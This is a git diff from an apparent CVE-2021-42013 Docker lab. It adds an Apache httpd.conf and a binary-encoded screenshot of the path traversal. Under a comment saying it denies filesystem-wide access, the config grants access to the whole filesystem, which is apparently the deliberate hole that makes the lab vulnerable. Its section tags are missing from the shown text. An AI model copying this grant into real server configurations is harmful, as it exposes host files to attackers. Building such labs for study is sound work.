+# directive.
+#
+# Change this to Listen on specific IP addresses as shown below to
+# prevent Apache from glomming onto all bound IP addresses.
+#
+#Listen 12.34.56.78:80
+Listen 80
+
+#
+# Dynamic Shared Object (DSO) Support
+#
+# To be able to use the functionality of a module which was built as a DSO you
+# have to place corresponding `LoadModule' lines at this location so the
+# directives contained in it are actually available _before_ they are used.
+# Statically compiled modules (those listed by `httpd -l') do not need
+# to be loaded here.
+#
+# Example:
+# LoadModule foo_module modules/mod_foo.so
+#
+LoadModule mpm_event_module modules/mod_mpm_event.so
+#LoadModule mpm_prefork_module modules/mod_mpm_prefork.so
+#LoadModule mpm_worker_module modules/mod_mpm_worker.so
+LoadModule authn_file_module modules/mod_authn_file.so
+#LoadModule authn_dbm_module modules/mod_authn_dbm.so
+#LoadModule authn_anon_module modules/mod_authn_anon.so
+#LoadModule authn_dbd_module modules/mod_authn_dbd.so
+#LoadModule authn_socache_module modules/mod_authn_socache.so
+LoadModule authn_core_module modules/mod_authn_core.so
+LoadModule authz_host_module modules/mod_authz_host.so
+LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
+LoadModule authz_user_module modules/mod_authz_user.so
+#LoadModule authz_dbm_module modules/mod_authz_dbm.so
+#LoadModule authz_owner_module modules/mod_authz_owner.so
+#LoadModule authz_dbd_module modules/mod_authz_dbd.so
+LoadModule authz_core_module modules/mod_authz_core.so
+#LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
+#LoadModule authnz_fcgi_module modules/mod_authnz_fcgi.so
+LoadModule access_compat_module modules/mod_access_compat.so
+LoadModule auth_basic_module modules/mod_auth_basic.so
+#LoadModule auth_form_module modules/mod_auth_form.so
+#LoadModule auth_digest_module modules/mod_auth_digest.so
+#LoadModule allowmethods_module modules/mod_allowmethods.so
+#LoadModule isapi_module modules/mod_isapi.so
+#LoadModule file_cache_module modules/mod_file_cache.so
+#LoadModule cache_module modules/mod_cache.so
+#LoadModule cache_disk_module modules/mod_cache_disk.so
+#LoadModule cache_socache_module modules/mod_cache_socache.so
+#LoadModule socache_shmcb_module modules/mod_socache_shmcb.so
+#LoadModule socache_dbm_module modules/mod_socache_dbm.so
+#LoadModule socache_memcache_module modules/mod_socache_memcache.so
+#LoadModule socache_redis_module modules/mod_socache_redis.so
+#LoadModule watchdog_module modules/mod_watchdog.so
+#LoadModule macro_module modules/mod_macro.so
+#LoadModule dbd_module modules/mod_dbd.so
+#LoadModule bucketeer_module modules/mod_bucketeer.so
+#LoadModule dumpio_module modules/mod_dumpio.so
+#LoadModule echo_module modules/mod_echo.so
+#LoadModule example_hooks_module modules/mod_example_hooks.so
+#LoadModule case_filter_module modules/mod_case_filter.so
+#LoadModule case_filter_in_module modules/mod_case_filter_in.so
+#LoadModule example_ipc_module modules/mod_example_ipc.so
+#LoadModule buffer_module modules/mod_buffer.so
+#LoadModule data_module modules/mod_data.so
+#LoadModule ratelimit_module modules/mod_ratelimit.so
+LoadModule reqtimeout_module modules/mod_reqtimeout.so
+#LoadModule ext_filter_module modules/mod_ext_filter.so
+#LoadModule request_module modules/mod_request.so
+#LoadModule include_module modules/mod_include.so
+LoadModule filter_module modules/mod_filter.so
+#LoadModule reflector_module modules/mod_reflector.so
+#LoadModule substitute_module modules/mod_substitute.so
+#LoadModule sed_module modules/mod_sed.so
+#LoadModule charset_lite_module modules/mod_charset_lite.so
+#LoadModule deflate_module modules/mod_deflate.so
+#LoadModule xml2enc_module modules/mod_xml2enc.so
+#LoadModule proxy_html_module modules/mod_proxy_html.so
+#LoadModule brotli_module modules/mod_brotli.so
+LoadModule mime_module modules/mod_mime.so
+#LoadModule ldap_module modules/mod_ldap.so
+LoadModule log_config_module modules/mod_log_config.so
+#LoadModule log_debug_module modules/mod_log_debug.so
+#LoadModule log_forensic_module modules/mod_log_forensic.so
+#LoadModule logio_module modules/mod_logio.so
+#LoadModule lua_module modules/mod_lua.so
+LoadModule env_module modules/mod_env.so
+#LoadModule mime_magic_module modules/mod_mime_magic.so
+#LoadModule cern_meta_module modules/mod_cern_meta.so
+#LoadModule expires_module modules/mod_expires.so
+LoadModule headers_module modules/mod_headers.so
+#LoadModule ident_module modules/mod_ident.so
+#LoadModule usertrack_module modules/mod_usertrack.so
+#LoadModule unique_id_module modules/mod_unique_id.so
+LoadModule setenvif_module modules/mod_setenvif.so
+LoadModule version_module modules/mod_version.so
+#LoadModule remoteip_module modules/mod_remoteip.so
+#LoadModule proxy_module modules/mod_proxy.so
+#LoadModule proxy_connect_module modules/mod_proxy_connect.so
+#LoadModule proxy_ftp_module modules/mod_proxy_ftp.so
+#LoadModule proxy_http_module modules/mod_proxy_http.so
+#LoadModule proxy_fcgi_module modules/mod_proxy_fcgi.so
+#LoadModule proxy_scgi_module modules/mod_proxy_scgi.so
+#LoadModule proxy_uwsgi_module modules/mod_proxy_uwsgi.so
+#LoadModule proxy_fdpass_module modules/mod_proxy_fdpass.so
+#LoadModule proxy_wstunnel_module modules/mod_proxy_wstunnel.so
+#LoadModule proxy_ajp_module modules/mod_proxy_ajp.so
+#LoadModule proxy_balancer_module modules/mod_proxy_balancer.so
+#LoadModule proxy_express_module modules/mod_proxy_express.so
+#LoadModule proxy_hcheck_module modules/mod_proxy_hcheck.so
+#LoadModule session_module modules/mod_session.so
+#LoadModule session_cookie_module modules/mod_session_cookie.so
+#LoadModule session_crypto_module modules/mod_session_crypto.so
+#LoadModule session_dbd_module modules/mod_session_dbd.so
+#LoadModule slotmem_shm_module modules/mod_slotmem_shm.so
+#LoadModule slotmem_plain_module modules/mod_slotmem_plain.so
+#LoadModule ssl_module modules/mod_ssl.so
+#LoadModule optional_hook_export_module modules/mod_optional_hook_export.so
+#LoadModule optional_hook_import_module modules/mod_optional_hook_import.so
+#LoadModule optional_fn_import_module modules/mod_optional_fn_import.so
+#LoadModule optional_fn_export_module modules/mod_optional_fn_export.so
+#LoadModule dialup_module modules/mod_dialup.so
+#LoadModule http2_module modules/mod_http2.so
+#LoadModule proxy_http2_module modules/mod_proxy_http2.so
+#LoadModule md_module modules/mod_md.so
+#LoadModule lbmethod_byrequests_module modules/mod_lbmethod_byrequests.so
+#LoadModule lbmethod_bytraffic_module modules/mod_lbmethod_bytraffic.so
+#LoadModule lbmethod_bybusyness_module modules/mod_lbmethod_bybusyness.so
+#LoadModule lbmethod_heartbeat_module modules/mod_lbmethod_heartbeat.so
+LoadModule unixd_module modules/mod_unixd.so
+#LoadModule heartbeat_module modules/mod_heartbeat.so
+#LoadModule heartmonitor_module modules/mod_heartmonitor.so
+#LoadModule dav_module modules/mod_dav.so
+LoadModule status_module modules/mod_status.so
+LoadModule autoindex_module modules/mod_autoindex.so
+#LoadModule asis_module modules/mod_asis.so
+#LoadModule info_module modules/mod_info.so
+#LoadModule suexec_module modules/mod_suexec.so
+
+ #LoadModule cgid_module modules/mod_cgid.so
+
+
+ #LoadModule cgi_module modules/mod_cgi.so
+
+#LoadModule dav_fs_module modules/mod_dav_fs.so
+#LoadModule dav_lock_module modules/mod_dav_lock.so
+#LoadModule vhost_alias_module modules/mod_vhost_alias.so
+#LoadModule negotiation_module modules/mod_negotiation.so
+LoadModule dir_module modules/mod_dir.so
+#LoadModule imagemap_module modules/mod_imagemap.so
+#LoadModule actions_module modules/mod_actions.so
+#LoadModule speling_module modules/mod_speling.so
+#LoadModule userdir_module modules/mod_userdir.so
+LoadModule alias_module modules/mod_alias.so
+#LoadModule rewrite_module modules/mod_rewrite.so
+
+
+#
+# If you wish httpd to run as a different user or group, you must run
+# httpd as root initially and it will switch.
+#
+# User/Group: The name (or #number) of the user/group to run httpd as.
+# It is usually good practice to create a dedicated user and group for
+# running httpd, as with most system services.
+#
+User daemon
+Group daemon
+
+
+
+# 'Main' server configuration
+#
+# The directives in this section set up the values used by the 'main'
+# server, which responds to any requests that aren't handled by a
+# definition. These values also provide defaults for
+# any containers you may define later in the file.
+#
+# All of these directives may appear inside containers,
+# in which case these default settings will be overridden for the
+# virtual host being defined.
+#
+
+#
+# ServerAdmin: Your address, where problems with the server should be
+# e-mailed. This address appears on some server-generated pages, such
+# as error documents. e.g. admin@your-domain.com
+#
+ServerAdmin you@example.com
+
+#
+# ServerName gives the name and port that the server uses to identify itself.
+# This can often be determined automatically, but we recommend you specify
+# it explicitly to prevent problems during startup.
+#
+# If your host doesn't have a registered DNS name, enter its IP address here.
+#
+#ServerName www.example.com:80
+
+#
+# Deny access to the entirety of your server's filesystem. You must
+# explicitly permit access to web content directories in other
+# blocks below.
+#
+
+ AllowOverride none
+ Require all granted
+
+
+#
+# Note that from this point forward you must specifically allow
+# particular features to be enabled - so if something's not working as
+# you might expect, make sure that you have specifically enabled it
+# below.
+#
+
+#
+# DocumentRoot: The directory out of which you will serve your
+# documents. By default, all requests are taken from this directory, but
+# symbolic links and aliases may be used to point to other locations.
+#
+DocumentRoot "/usr/local/apache2/htdocs"
+
+ #
+ # Possible values for the Options directive are "None", "All",
+ # or any combination of:
+ # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews
+ #
+ # Note that "MultiViews" must be named *explicitly* --- "Options All"
+ # doesn't give it to you.
+ #
+ # The Options directive is both complicated and important. Please see
+ # http://httpd.apache.org/docs/2.4/mod/core.html#options
+ # for more information.
+ #
+ Options Indexes FollowSymLinks
+
+ #
+ # AllowOverride controls what directives may be placed in .htaccess files.
+ # It can be "All", "None", or any combination of the keywords:
+ # AllowOverride FileInfo AuthConfig Limit
+ #
+ AllowOverride None
+
+ #
+ # Controls who can get stuff from this server.
+ #
+ Require all granted
+
+
+#
+# DirectoryIndex: sets the file that Apache will serve if a directory
+# is requested.
+#
+
+ DirectoryIndex index.html
+
+
+#
+# The following lines prevent .htaccess and .htpasswd files from being
+# viewed by Web clients.
+#
+
+ Require all denied
+
+
+#
+# ErrorLog: The location of the error log file.
+# If you do not specify an ErrorLog directive within a
+# container, error messages relating to that virtual host will be
+# logged here. If you *do* define an error logfile for a
+# container, that host's errors will be logged there and not here.
+#
+ErrorLog /proc/self/fd/2
+
+#
+# LogLevel: Control the number of messages logged to the error_log.
+# Possible values include: debug, info, notice, warn, error, crit,
+# alert, emerg.
+#
+LogLevel warn
+
+
+ #
+ # The following directives define some format nicknames for use with
+ # a CustomLog directive (see below).
+ #
+ LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
+ LogFormat "%h %l %u %t \"%r\" %>s %b" common
+
+
+ # You need to enable mod_logio.c to use %I and %O
+ LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
+
+
+ #
+ # The location and format of the access logfile (Common Logfile Format).
+ # If you do not define any access logfiles within a
+ # container, they will be logged here. Contrariwise, if you *do*
+ # define per- access logfiles, transactions will be
+ # logged therein and *not* in this file.
+ #
+ CustomLog /proc/self/fd/1 common
+
+ #
+ # If you prefer a logfile with access, agent, and referer information
+ # (Combined Logfile Format) you can use the following directive.
+ #
+ #CustomLog "logs/access_log" combined
+
+
+
+ #
+ # Redirect: Allows you to tell clients about documents that used to
+ # exist in your server's namespace, but do not anymore. The client
+ # will make a new request for the document at its new location.
+ # Example:
+ # Redirect permanent /foo http://www.example.com/bar
+
+ #
+ # Alias: Maps web paths into filesystem paths and is used to
+ # access content that does not live under the DocumentRoot.
+ # Example:
+ # Alias /webpath /full/filesystem/path
+ #
+ # If you include a trailing / on /webpath then the server will
+ # require it to be present in the URL. You will also likely
+ # need to provide a section to allow access to
+ # the filesystem path.
+
+ #
+ # ScriptAlias: This controls which directories contain server scripts.
+ # ScriptAliases are essentially the same as Aliases, except that
+ # documents in the target directory are treated as applications and
+ # run by the server when requested rather than as documents sent to the
+ # client. The same rules about trailing "/" apply to ScriptAlias
+ # directives as to Alias.
+ #
+ ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
+
+
+
+
+ #
+ # ScriptSock: On threaded servers, designate the path to the UNIX
+ # socket used to communicate with the CGI daemon of mod_cgid.
+ #
+ #Scriptsock cgisock
+
+
+#
+# "/usr/local/apache2/cgi-bin" should be changed to whatever your ScriptAliased
+# CGI directory exists, if you have that configured.
+#
+
+ AllowOverride None
+ Options None
+ Require all granted
+
+
+
+ #
+ # Avoid passing HTTP_PROXY environment to CGI's on this or any proxied
+ # backend servers which have lingering "httpoxy" defects.
+ # 'Proxy' request header is undefined by the IETF, not listed by IANA
+ #
+ RequestHeader unset Proxy early
+
+
+
+ #
+ # TypesConfig points to the file containing the list of mappings from
+ # filename extension to MIME-type.
+ #
+ TypesConfig conf/mime.types
+
+ #
+ # AddType allows you to add to or override the MIME configuration
+ # file specified in TypesConfig for specific file types.
+ #
+ #AddType application/x-gzip .tgz
+ #
+ # AddEncoding allows you to have certain browsers uncompress
+ # information on the fly. Note: Not all browsers support this.
+ #
+ #AddEncoding x-compress .Z
+ #AddEncoding x-gzip .gz .tgz
+ #
+ # If the AddEncoding directives above are commented-out, then you
+ # probably should define those extensions to indicate media types:
+ #
+ AddType application/x-compress .Z
+ AddType application/x-gzip .gz .tgz
+
+ #
+ # AddHandler allows you to map certain file extensions to "handlers":
+ # actions unrelated to filetype. These can be either built into the server
+ # or added with the Action directive (see below)
+ #
+ # To use CGI scripts outside of ScriptAliased directories:
+ # (You will also need to add "ExecCGI" to the "Options" directive.)
+ #
+ #AddHandler cgi-script .cgi
+
+ # For type maps (negotiated resources):
+ #AddHandler type-map var
+
+ #
+ # Filters allow you to process content before it is sent to the client.
+ #
+ # To parse .shtml files for server-side includes (SSI):
+ # (You will also need to add "Includes" to the "Options" directive.)
+ #
+ #AddType text/html .shtml
+ #AddOutputFilter INCLUDES .shtml
+
+
+#
+# The mod_mime_magic module allows the server to use various hints from the
+# contents of the file itself to determine its type. The MIMEMagicFile
+# directive tells the module where the hint definitions are located.
+#
+#MIMEMagicFile conf/magic
+
+#
+# Customizable error responses come in three flavors:
+# 1) plain text 2) local redirects 3) external redirects
+#
+# Some examples:
+#ErrorDocument 500 "The server made a boo boo."
+#ErrorDocument 404 /missing.html
+#ErrorDocument 404 "/cgi-bin/missing_handler.pl"
+#ErrorDocument 402 http://www.example.com/subscription_info.html
+#
+
+#
+# MaxRanges: Maximum number of Ranges in a request before
+# returning the entire resource, or one of the special
+# values 'default', 'none' or 'unlimited'.
+# Default setting is to accept 200 Ranges.
+#MaxRanges unlimited
+
+#
+# EnableMMAP and EnableSendfile: On systems that support it,
+# memory-mapping or the sendfile syscall may be used to deliver
+# files. This usually improves server performance, but must
+# be turned off when serving from networked-mounted
+# filesystems or if support for these functions is otherwise
+# broken on your system.
+# Defaults: EnableMMAP On, EnableSendfile Off
+#
+#EnableMMAP off
+#EnableSendfile on
+
+# Supplemental configuration
+#
+# The configuration files in the conf/extra/ directory can be
+# included to add extra features or to modify the default configuration of
+# the server, or you may simply copy their contents here and change as
+# necessary.
+
+# Server-pool management (MPM specific)
+#Include conf/extra/httpd-mpm.conf
+
+# Multi-language error messages
+#Include conf/extra/httpd-multilang-errordoc.conf
+
+# Fancy directory listings
+#Include conf/extra/httpd-autoindex.conf
+
+# Language settings
+#Include conf/extra/httpd-languages.conf
+
+# User home directories
+#Include conf/extra/httpd-userdir.conf
+
+# Real-time info on requests and configuration
+#Include conf/extra/httpd-info.conf
+
+# Virtual hosts
+#Include conf/extra/httpd-vhosts.conf
+
+# Local access to the Apache HTTP Server Manual
+#Include conf/extra/httpd-manual.conf
+
+# Distributed authoring and versioning (WebDAV)
+#Include conf/extra/httpd-dav.conf
+
+# Various default settings
+#Include conf/extra/httpd-default.conf
+
+# Configure mod_proxy_html to understand HTML4/XHTML1
+
+Include conf/extra/proxy-html.conf
+
+
+# Secure (SSL/TLS) connections
+#Include conf/extra/httpd-ssl.conf
+#
+# Note: The following must must be present to support
+# starting without SSL on platforms with no /dev/random equivalent
+# but a statically compiled-in mod_ssl.
+#
+
+SSLRandomSeed startup builtin
+SSLRandomSeed connect builtin
+
diff --git a/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/path_traversal.png b/cve/linux-kernel/2021/cve-2021-42013-docker-lab-main/path_traversal.png
new file mode 100644
index 0000000000000000000000000000000000000000..d6a1a1e29b6c5363e7d789b27889144051a19db9
GIT binary patch
literal 101305
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
